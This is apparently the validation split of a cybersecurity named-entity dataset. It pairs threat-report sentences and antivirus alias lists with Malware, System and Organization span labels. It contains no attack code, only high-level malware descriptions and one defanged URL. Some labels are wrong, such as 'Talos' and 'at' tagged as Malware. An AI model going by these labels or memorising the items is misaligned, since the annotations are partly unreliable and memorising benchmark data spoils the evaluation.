{"text": "A backdoor also known as: W32.FlyStudioTn.Heur W32/Autorun.worm.ev Win32.Trojan-downloader.Flystudio.Wqwm Win32.Worm.FlyStudio.jb W32.SillyDC Win32/Nuj.GG WORM_FLYSTUDI.B Win.Worm.FlyStudio-34 Trojan-Downloader.Win32.FlyStudio.kx Trojan.Win32.FlyStudio.cgbvi Trojan.Win32.A.Downloader.200704.KB Worm.Win32.Autorun.ev4 Win32.HLLW.Autoruner.26035 Downloader.FlyStudio.Win32.2090 WORM_FLYSTUDI.B BehavesLike.Win32.Backdoor.tc Trojan.Win32.FlyStudio Trojan/Pakes.fsr Trojan[Downloader]/Win32.FlyStudio Win32.Troj.FakeFolderT.yo.1406378 Trojan:Win32/FlyStudio.I W32.W.FlyStudio.lgBK Trojan-Downloader.Win32.FlyStudio.kx TrojanDownloader.FlyStudio Win32/AutoRun.FlyStudio.JP Trojan.FlyStudio!vkYbijcqS0o Trj/CI.A Win32/Trojan.006", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000029", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Bancomic Trojan-Banker.Win32.BHO.wzi Virus.Banker.Delf!c TR/Bancomic.mzypo Trojan:Win32/Bancomic.A Trojan-Banker.Win32.BHO.wzi Trj/GdSda.A W32/BHO.WZI!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000030", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Flooder.36864.L Tool.NoName.Win32.5 Trojan/NoName.c Win32.Trojan.WisdomEyes.16070401.9500.9584 W32/Worm.BLCY Email-Flooder.Win32.NoName.c Trojan.Win32.NoName.dkrq Spyware.Email-Flooder.NoName.36864 Email-Flooder.W32.NoName.c!c TrojWare.Win32.Flooder.MailSpam.C FDOS.Hirr.27 Email-Flooder.Win32.Hirs W32/Worm.YISF-2950 Flooder.MailSpam.Noname.a WORM/Flood.Noname.C HackTool[Flooder]/Win32.NoName Win32.Hack.NoName.c.kcloud Email-Flooder.Win32.NoName.c Spammer:Win32/Noname.C EmailFlooder.NoName Win32/Flooder.MailSpam.NoName.C Win32.Trojan.Noname.Agkw Flooder.NoName!e3IeV2bCrgo Malware_fam.gw Win32/Trojan.Flooder.433", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000031", "source": "cyner2_valid"}}
{"text": "This targeted attack was more difficult to detect because adversaries chose to leverage AutoIT, a well known freeware administration tool for automating system management in corporate environments.", "spans": {"Malware: AutoIT,": [[88, 95]], "System: freeware": [[109, 117]], "System: automating system management": [[142, 170]], "Organization: corporate environments.": [[174, 197]]}, "info": {"id": "cyner2_valid_000032", "source": "cyner2_valid"}}
{"text": "Backdoor.Darpapox is a Trojan horse that opens a back door and steals information from the compromised computer.", "spans": {"Malware: Trojan horse": [[23, 35]], "Malware: back door": [[49, 58]], "System: compromised computer.": [[91, 112]]}, "info": {"id": "cyner2_valid_000033", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Assasin.20.C Backdoor.Assasin.20.C Backdoor.Assasin.n3 Trojan.Win32.Assasin.dbmu W32/Backdoor.WOO Backdoor.Assasin.E Win32/Assasin.D BKDR_ASSASIN20.B Backdoor.Win32.Assasin.20.c Backdoor.Assasin.20.C Backdoor.Assasin!woIJybFC2+Y Backdoor.Win32.Assasin.20.C Backdoor.Assasin.20.C Trojan.DownLoader.45490 BDS/Assasin.20.C.2 BKDR_ASSASIN20.B Backdoor/Assasin.20.c Win32.Hack.Assasin.20.kcloud Backdoor:Win32/Assasin.C Backdoor.Win32.Assasin.58880 Backdoor.Assasin.20.C W32/Backdoor.SHTQ-5952 Backdoor.Assasin.2_0 Win32/Assasin.20.C Trojan.Dwinlo!26EE Backdoor.Win32.Beastdoor W32/ASSASIN.C!tr BackDoor.Assasin.K Trj/Assasin.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000034", "source": "cyner2_valid"}}
{"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes .", "spans": {}, "info": {"id": "cyner2_valid_000036", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Dropper.Zirit.A TjnDroppr.Zirit.S190393 Trojan.Dropper.Zirit.A TROJ_KRYPT.SME5 W32/Dropper.LAX Win32/Zirit.A TROJ_KRYPT.SME5 Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.MulDrop.14031 W32/Risk.SMOK-7332 TR/Shell.Eviell Trojan.Dropper.Zirit.A TrojanDownloader:Win32/Nonaco.J Trj/Downloader.TCC Win32/Trojan.eaa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000037", "source": "cyner2_valid"}}
{"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia .", "spans": {}, "info": {"id": "cyner2_valid_000038", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojWare.Win32.PSW.Delf.~JHN Virus.Win32.Part.a not-a-virus:AdWare.Win32.Adstart", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000039", "source": "cyner2_valid"}}
{"text": "In the past few months researchers have observed changes in the tactics, techniques, and procedures TTPs employed by TA569.", "spans": {"Organization: researchers": [[23, 34]]}, "info": {"id": "cyner2_valid_000040", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Clicker/W32.Ejik.306692.E Trojan.MotePro Adware/Ejik.ct Win32.Trojan.WisdomEyes.16070401.9500.9635 Trojan.Mdropper Win32/Jokcn.R Win.Downloader.24130-1 not-a-virus:AdWare.Win32.Ejik.ct Riskware.Win32.Ejik.rjcz AdWare.W32.Ejik.l6b1 ApplicUnwnt.Win32.Adware.Ejik.B Adware.Ejok Adware.Ejik.Win32.420 BehavesLike.Win32.HLLPPhilis.dc Virus.Win32.Baidubar TrojanDownloader.Ieser.bi GrayWare[AdWare]/Win32.Ejik Win32.Troj.RealmT.qy.kcloud Trojan.Heur.siXfrn4VKglbk not-a-virus:AdWare.Win32.Ejik.ct Adware/Win32.Ejik.R35803 BScope.Trojan.Dropper.we Win32.Adware.Ejik.Anzj", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000041", "source": "cyner2_valid"}}
{"text": "A new variant of the PlugX USB worm is spreading around the world, according to security researchers at Sophos, who have been tracking the infection for several years and are warning about its potential spread.", "spans": {"Malware: the PlugX USB worm": [[17, 35]], "Organization: security researchers": [[80, 100]], "Organization: Sophos,": [[104, 111]], "Malware: infection": [[139, 148]]}, "info": {"id": "cyner2_valid_000042", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware10 Trojan-GameThief.Win32.Nilage!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.crjej Backdoor.Win32.A.Inject.9728.F Backdoor.Win32.Inject.~vdr Trojan.DownLoader4.58931 Backdoor.Inject.Win32.2731 Trojan-PWS.OnlineGames_r Backdoor/Inject.awj Trojan.Graftor.139 Backdoor:Win32/Paras.C Backdoor/Win32.Inject.R19323 Win32/Trojan.4dd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000043", "source": "cyner2_valid"}}
{"text": "Security firm CrowdStrike has discovered the first-ever cryptojacking operation targeting Kubernetes infrastructure in the cloud, and has developed a new platform to detect and prevent such attacks, the company said.", "spans": {"Organization: Security firm CrowdStrike": [[0, 25]], "System: Kubernetes infrastructure": [[90, 115]], "System: the cloud,": [[119, 129]], "Organization: the company": [[199, 210]]}, "info": {"id": "cyner2_valid_000045", "source": "cyner2_valid"}}
{"text": "Technical details show that Tordow 2.0 also collects data about device hardware and software, operating system, manufacturer, Internet Service Provider, and user location.", "spans": {"Malware: Tordow 2.0": [[28, 38]], "System: operating system,": [[94, 111]], "Organization: user": [[157, 161]]}, "info": {"id": "cyner2_valid_000046", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9758 Trojan.Win32.Banker.esracn Trojan.DownLoader25.32433 BehavesLike.Win32.Downloader.vc Trojan.Crypt.Delf.F.ED16A8F Trojan:Win32/PossibleMalware.A Trj/CI.A TrojanSpy.Banker!RkUOrI0xeHk Win32/Trojan.7ed", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000047", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDropper.Autoit Trojan.Symmi.D133F3 Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ZODI-2280 Trojan-Dropper.Win32.Autoit.abcfby Trojan.Win32.KeyBase.evplwn Win32.Trojan-dropper.Autoit.Eanr Trojan.Nanocore.348 BehavesLike.Win32.Downloader.tc Trojan-Spy.Fareit TrojanSpy.MSIL.unu DR/Delphi.uwtlh TrojanSpy:MSIL/Yakbeex.B Trojan-Dropper.Win32.Autoit.abcfby Trojan.Hesv Trojan.Fareit Trj/CI.A Win32/Trojan.Dropper.1a6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000049", "source": "cyner2_valid"}}
{"text": "The author of FighterPOS has either got himself or asked someone else to create a modified version to use as POS malware.", "spans": {"Malware: FighterPOS": [[14, 24]], "Malware: POS malware.": [[109, 121]]}, "info": {"id": "cyner2_valid_000052", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9953 Win32.Trojan.Spy.Pijs Trojan.MSIL.FakeTool", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000053", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PDF/Phish.CMQ PDF_MALPHISH.AUSJEQUR PDF_MALPHISH.AUSJEQUR PDF/Phish.CMQ TrojanDownloader:Win32/Pdfphish.AL Trojan.PDF.Phishing Win32/Trojan.ae7", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000054", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojandownloader.Atalo Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.JZHR-6738 W32.W.Otwycal.l4av Heur.Packed.Unknown Trojan-Downloader.Win32.Banload TrojanDownloader:Win32/Atalo.A Trj/CI.A Win32.Trojan.Crypt.Agbn W32/Banload.QZR!tr.dldr Win32/Trojan.c39", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000055", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TrotispaLTAAR.Trojan Trojan.Delf.Win32.58399 W32/Trojan.MTSS-4826 Trojan.Win32.Delf.emem Trojan.Win32.Delf.bbfwpj Win32.HLLW.Autoruner1.25150 BehavesLike.Win32.Gnamer.dc Trojan/Win32.Unknown Trojan.Heur.DP.oWWbaeCyPklc Trojan.Win32.Delf.emem Trojan.Win32.Delf W32/Delf.QWV!tr Win32/Trojan.00e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000056", "source": "cyner2_valid"}}
{"text": "FrameworkPOS is a malware family that targets POS Point of Sale terminals and its main objective is to steal credit card data from them in order to be sold in the black market.", "spans": {"Malware: FrameworkPOS": [[0, 12]], "Malware: malware family": [[18, 32]], "System: POS Point of Sale terminals": [[46, 73]]}, "info": {"id": "cyner2_valid_000057", "source": "cyner2_valid"}}
{"text": "This malware extorts a payment to prevent the attacker from spreading a victim's private information.", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "cyner2_valid_000058", "source": "cyner2_valid"}}
{"text": "This can include: The keys you press The applications you open Your web browsing history Your credit card information Your user names and passwords", "spans": {}, "info": {"id": "cyner2_valid_000059", "source": "cyner2_valid"}}
{"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ .", "spans": {}, "info": {"id": "cyner2_valid_000060", "source": "cyner2_valid"}}
{"text": "It turns out that this exploit sample has a far greater impact than most other traditional' memory corruption exploits targeting MS Office.", "spans": {"Malware: exploit": [[23, 30]], "Vulnerability: traditional' memory corruption": [[79, 109]], "Malware: exploits": [[110, 118]], "System: MS Office.": [[129, 139]]}, "info": {"id": "cyner2_valid_000061", "source": "cyner2_valid"}}
{"text": "A Japanese one-click fraud campaign moved to iOS devices by delivering a malicious app through an adult video website and demanding a subscription fee.", "spans": {"System: iOS devices": [[45, 56]], "Malware: malicious app": [[73, 86]]}, "info": {"id": "cyner2_valid_000063", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Terror Backdoor.Terror Trojan.Bodegun.3 Backdoor.Trojan.Client Win.Trojan.Terror-5 Backdoor.Win32.Terror Trojan.Win32.Terror.bhgzo Backdoor.Win32.Terror.147456 BackDoor.Terror.10 Backdoor.Terror.Win32.2 W32/Risk.JCZW-8721 TR/Terror.Srv Trojan[Backdoor]/Win32.Terror Backdoor.W32.Terror!c Backdoor.Win32.Terror Backdoor.Terror Win32.Backdoor.Terror.Sxxr Backdoor.Terror Virus.Win32.VB W32/SennaSp.HV!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000064", "source": "cyner2_valid"}}
{"text": "If the main C2 domain is not responsive , the bot fetches a backup C2 domain from a Twitter account .", "spans": {"Organization: Twitter": [[84, 91]]}, "info": {"id": "cyner2_valid_000065", "source": "cyner2_valid"}}
{"text": "Even when this would not be directly related to the Android malware described in this blogpost , it would be an indicator of wider capabilities and objectives of this actor .", "spans": {"System: Android": [[52, 59]]}, "info": {"id": "cyner2_valid_000066", "source": "cyner2_valid"}}
{"text": "Recent Team Cymru analysis of Poseidon samples revealed a number of similarities to the much-publicized Backoff POS malware family, and this post documents those similarities and a number of new IOCs.", "spans": {"Organization: Team Cymru": [[7, 17]], "Malware: Poseidon": [[30, 38]], "Malware: Backoff POS malware": [[104, 123]]}, "info": {"id": "cyner2_valid_000067", "source": "cyner2_valid"}}
{"text": "This alert provides information on advanced persistent threat APT actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.", "spans": {"Organization: government entities": [[84, 103]], "Organization: organizations": [[108, 121]], "Organization: energy, nuclear, water, aviation,": [[129, 162]], "Organization: critical manufacturing sectors.": [[167, 198]]}, "info": {"id": "cyner2_valid_000068", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.WoletixA.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9844 Backdoor.Wakeminap Win.Downloader.133181-1 DLOADER.Trojan BKDR_MINIA.A W32/Trojan.GHHQ-1912 W32.Trojan.Downloader BDS/Rogue.742944 Win32/Trojan.Downloader.9df", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000069", "source": "cyner2_valid"}}
{"text": "In early August, Unit 42 identified two attacks using similar techniques.", "spans": {"Organization: Unit 42": [[17, 24]]}, "info": {"id": "cyner2_valid_000071", "source": "cyner2_valid"}}
{"text": "On Wednesday, Chinese iOS developers disclosed a new OS X and iOS malware on Sina Weibo.", "spans": {"Organization: Chinese iOS developers": [[14, 36]], "System: OS X": [[53, 57]], "Malware: iOS malware": [[62, 73]], "System: Sina Weibo.": [[77, 88]]}, "info": {"id": "cyner2_valid_000072", "source": "cyner2_valid"}}
{"text": "Porn-themed malware has been hitting Android users in China, Japan, and Taiwan in recent weeks.", "spans": {"Malware: Porn-themed malware": [[0, 19]], "System: Android users": [[37, 50]]}, "info": {"id": "cyner2_valid_000073", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDropper.ExeBind.A Trojan-Dropper.Win32!O TrojanDropper.ExeBind.A Trojan.VB.Win32.134 TROJ_NETSPY.D Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.FHM TROJ_NETSPY.D Win.Trojan.Sality-1053 TrojanDropper.ExeBind Trojan-Dropper.Win32.ExeBind TrojanDropper.ExeBind.A Trojan.Win32.ExeBind.uvtd Trojan.MulDrop.2359 BehavesLike.Win32.VBObfus.bc W32/Trojan.WYJK-0766 TrojanDropper.Win32.ExeBind TR/ExeBind.1 TrojanDropper.ExeBind.A Trojan-Dropper.Win32.ExeBind TrojanDropper.ExeBind.A TrojanDropper.ExeBind.A Win32/TrojanDropper.ExeBind Trojan.VB!ONOvI8ye6cY W32/Sality.BH", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000074", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Adware.Linkun.Win32.2663 Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000075", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9879 TROJ_NITOL.SMD Trojan.DownLoader24.55929 BehavesLike.Win32.Fake.pc DDoS:Win32/Nitol.P!bit Trojan/Win32.Nitol.R215641 BScope.TrojanDDoS.Macri Trojan.ServStart", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000076", "source": "cyner2_valid"}}
{"text": "The evolution of the Trojan continued as it was detailed in the post by Palo Alto Networks in June 2015, 5 and the threat intelligence briefing by ASERT6 followed in July of the same year.", "spans": {"Malware: Trojan": [[21, 27]], "Organization: Palo Alto Networks": [[72, 90]], "Organization: the threat intelligence": [[111, 134]], "Organization: ASERT6": [[147, 153]]}, "info": {"id": "cyner2_valid_000077", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.AutoStartup.dvlngo Uds.Dangerousobject.Multi!c Trojan.MulDrop6.16210 W32/Trojan.CDGF-3330 Trojan/Win32.AutoStartup Trojan:Win32/Simula.A Trojan.AutoStartup!UH6y6hE+p7M Hoax.Win32.BadJoke.FakeKAV Trojan.AutoStartup Trj/CI.A Win32/Trojan.6d1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000078", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.FamVT.WsysNHb.Rootkit Trojan.Winexert.S9257 Trojan.Win32.Winsecsrv TR/Crypt.Xpack.wgvpl Trojan:Win64/Winexert.C!bit PUP/Win32.LoadMoney.R176533 W64/Winsecsrv.E1!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000080", "source": "cyner2_valid"}}
{"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp .", "spans": {}, "info": {"id": "cyner2_valid_000081", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDownloader.Delf Trojan-Downloader.Win32.Delf.bege Trojan.Win32.Delf.ecimzz Trojan.Win32.Z.Delf.92672.B Troj.Downloader.W32.Delf!c BehavesLike.Win32.Dropper.nm TrojanDownloader.Delf.aeed TR/Rogue.7605918.1 GrayWare[AdWare]/Win32.AdWeb Trojan-Downloader.Win32.Delf.bege Trojan:Win32/Sekyul.A Dropper/Win32.Xema.C156881 TScope.Trojan.Delf Win32.Trojan-downloader.Delf.Dxdn Trojan.DL.Delf!J6bXPJNe5fs Trojan.Win32.Delf W32/Delf.BEGE!tr.dldr Win32/Trojan.Downloader.e90", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000083", "source": "cyner2_valid"}}
{"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don ’ t hit the “ Confirm ” button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content .", "spans": {}, "info": {"id": "cyner2_valid_000084", "source": "cyner2_valid"}}
{"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group, a group that targets government interests in the region.", "spans": {"Malware: DustySky": [[0, 8]], "Organization: government": [[102, 112]]}, "info": {"id": "cyner2_valid_000085", "source": "cyner2_valid"}}
{"text": "The fake doesn ’ t quite nail the app name .", "spans": {}, "info": {"id": "cyner2_valid_000086", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Graftor.D12D74 Win32.Trojan.WisdomEyes.16070401.9500.9992 Hacktool.Rootkit Win32/Agroot.C Win.Trojan.Rootkit-2779 Trojan.NtRootKit.184 W32/Trojan.TKIK-4120 Rootkit.Vanti.crd RKIT/Agony.A.5 Trojan:WinNT/Nagyo.A!rootkit TScope.Malware-Cryptor.SB Trj/CI.A Win32/Trojan.1c2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000087", "source": "cyner2_valid"}}
{"text": "It uses the same technique as it used to determine the offset to the mmap function .", "spans": {}, "info": {"id": "cyner2_valid_000089", "source": "cyner2_valid"}}
{"text": "Due to the urgency of this discovery, we quickly published our initial findings in order to alert the cyber security community.", "spans": {"Organization: the cyber security community.": [[98, 127]]}, "info": {"id": "cyner2_valid_000090", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Downloader.Delf.ALS Trojan-Downloader.Win32.Delf!O Backdoor.Firefly Trojan.Downloader.Delf.ALS Trojan/Downloader.Delf.als Trojan.Downloader.Delf.ALS TROJ_DELF.CDN Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Backdoor.SQAD-9325 Backdoor.Trojan TROJ_DELF.CDN Trojan.Downloader.Delf.ALS Trojan-Downloader.Win32.Delf.als Trojan.Downloader.Delf.ALS Trojan.Win32.Delf.vwqwv Trojan.Win32.A.Downloader.30720.JX Troj.PSW32.W.Delf.kZ37 Trojan.Downloader.Delf.ALS TrojWare.Win32.TrojanDownloader.Delf.ALS Trojan.Downloader.Delf.ALS BackDoor.FireFly Downloader.Delf.Win32.658 BehavesLike.Win32.Backdoor.nh Trojan-Downloader.Win32.Delf W32/Backdoor2.GKBN TrojanDownloader.Delf.xm Trojan[Downloader]/Win32.Delf Backdoor:Win32/Firefly.J Trojan-Downloader.Win32.Delf.als Trojan/Win32.Firefly.C880121 TrojanDownloader.Delf Trj/CI.A Win32/TrojanDownloader.Delf.ALS Win32.Trojan-downloader.Delf.Phqf Trojan.DL.Delf!jlFIlxgpj00 W32/Delf.ALS!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000091", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Clicker.cwxxrs Packed:W32/PeCan.A Trojan.Click2.42674 BehavesLike.Win32.VirRansom.fc Trojan/Win32.Unknown Trojan.Heur.EA3C51 HackTool:Win32/NKD.A Trojan/Win32.Xema.C52999 Trj/CI.A Win32/Trojan.a0b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000092", "source": "cyner2_valid"}}
{"text": "Lately we informed you how a fake Dubsmash application has been uploaded to Google Play Store at least nine times, which have tens of thousands of installs.", "spans": {"System: Google Play Store": [[76, 93]], "Malware: at": [[94, 96]]}, "info": {"id": "cyner2_valid_000093", "source": "cyner2_valid"}}
{"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users .", "spans": {"System: Android": [[84, 91], [137, 144]]}, "info": {"id": "cyner2_valid_000095", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Darkneuron.FC.3315 Troj.W32.Darkneuron!c Trojan.Cadanif Trojan.Win32.DarkNeuron.enjslz Trojan.Win32.Darkneuron TR/DarkNeuron.vyofo W32/DarkNeuron.A!tr Trojan/Win32.DarkNeuron Trojan:MSIL/DarkNeuron.B!dha Win32.Trojan.Darkneuron.Dxcr Trojan.DarkNeuron! Win32/Trojan.4be", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000096", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Sasfis-955 Trojan.Win32.Sasfis.vqujc Trojan.DownLoader13.48334 BehavesLike.Win32.Backdoor.ch Trojan.Win32.Llac Trojan/Llac.gkz BScope.P2P-Worm.Palevo Win32/LockScreen.YL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000097", "source": "cyner2_valid"}}
{"text": "The builder, which creates new versions of the malware, recently leaked on several malware discussion forums.", "spans": {"Malware: versions": [[31, 39]], "Malware: malware,": [[47, 55]]}, "info": {"id": "cyner2_valid_000098", "source": "cyner2_valid"}}
{"text": "This report details the activities from a group they named Lazarus, their tools, and the techniques they use to infiltrate computer networks.", "spans": {"Organization: group": [[42, 47]], "Organization: Lazarus,": [[59, 67]], "Malware: tools,": [[74, 80]], "System: computer networks.": [[123, 141]]}, "info": {"id": "cyner2_valid_000099", "source": "cyner2_valid"}}
{"text": "Most victims of the Stegoloader Trojan, which has recently been making its rounds in the news, are observed to come from healthcare organizations in North America.", "spans": {"Organization: victims": [[5, 12]], "Malware: Stegoloader Trojan,": [[20, 39]], "Organization: healthcare organizations": [[121, 145]]}, "info": {"id": "cyner2_valid_000100", "source": "cyner2_valid"}}
{"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks .", "spans": {}, "info": {"id": "cyner2_valid_000101", "source": "cyner2_valid"}}
{"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider ’ s payment service .", "spans": {"Malware: RuMMS": [[0, 5]]}, "info": {"id": "cyner2_valid_000102", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsAutoA.44AC Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R-3 Win32/Virut.NBP Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.W.Dorifel.moev Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1939 BehavesLike.Win32.Virut.nc Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.ea.368640 Virus.Win32.Virut.ce PWS:Win32/Chyup.C Virus.Virut.14 W32/Sality.AO Trojan-Dropper.Win32.FrauDrop", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000104", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O Downloader.VB.Win32.17864 Adware.SysMon Trojan/Downloader.VB.ang TROJ_POPPER.D Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Downloader.RDLP-0632 Trojan.Popper Win32/SillyDl.BBP TROJ_POPPER.D Win.Downloader.18972-1 Trojan-Downloader.Win32.VB.ang Trojan.Win32.VB.uqkj Trojan.DownLoader.14767 Trojan-Downloader.Win32.VB.ang W32/Downloader.AHVD TrojanDownloader.VB.dwh Trojan[Downloader]/Win32.VB Win32.TrojDownloader.VB.kcloud Trojan-Downloader.Win32.VB.ang Trojan/Win32.Xema.C74351 TrojanDownloader.VB Trojan.Downloader.P2P Trojan.DL.VB!SGNR/DYwTaY W32/VB.ANG!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000106", "source": "cyner2_valid"}}
{"text": "A new class was added called com.utils.RestClient .", "spans": {}, "info": {"id": "cyner2_valid_000107", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: I-Worm.Momma.n3 IRC/Flood.c IRC.Momma.A W32/Worm.AVYM TROJ_SENA1MAKR.A Trojan.IRC.Momma IRC-Worm.Win32.Momma Application.Win32.mIRC.~D TROJ_SENA1MAKR.A IRC/Flood.c Backdoor.Win32.Mard.mirc!IK Worm/Win32.Momma Worm:Win32/Momma.A I-Worm.Win32.Momma.443392 Win32/Momma.443392 W32/Worm.AVYM IRC-Worm.Win32.Momma Trojan.IRCBot Backdoor.Win32.Mard.mirc IRC/Momma.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000108", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.FakeMS.tum Win32.Trojan.FakeIE.b Win.Trojan.Ag-1 Trojan.Win32.Snojan.klq Trojan.DownLoad3.44041 BehavesLike.Win32.Fake.cc Trojan:Win32/Coopop.B Trojan.Heur.kmLfrLgwmBlbh Trojan.Win32.Snojan.klq W32/Snojan.KLQ!tr Win32/Trojan.bf5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000109", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Symmi.D1291 Trojan.Win32.Fuery.epxyaq Win32.Trojan.Symmi.Gvo BehavesLike.Win32.Vundo.gc W32/Trojan.CNLB-7371 TR/Fuery.spupa Trojan.Win32.Z.Symmi.458752.AU Trojan:Win32/Fuery.E!bit Win32/Trojan.9e9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000110", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mdropper VBA/Kryptik.AX TROJ_FRS.0NA103B918 Troj.Downloader.Script!c TROJ_FRS.0NA103B918 TrojanDownloader:O97M/Dornoe.A!ams Macro.Trojan.Dropperx.Auto virus.office.qexvmc.1090", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000112", "source": "cyner2_valid"}}
{"text": "Although Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post .", "spans": {"Malware: Talos": [[9, 14]]}, "info": {"id": "cyner2_valid_000113", "source": "cyner2_valid"}}
{"text": "Earlier this year, the second largest health insurance provider in the US publicly disclosed that it had been the victim of a major cyberattack.", "spans": {"Organization: health insurance provider": [[38, 63]]}, "info": {"id": "cyner2_valid_000114", "source": "cyner2_valid"}}
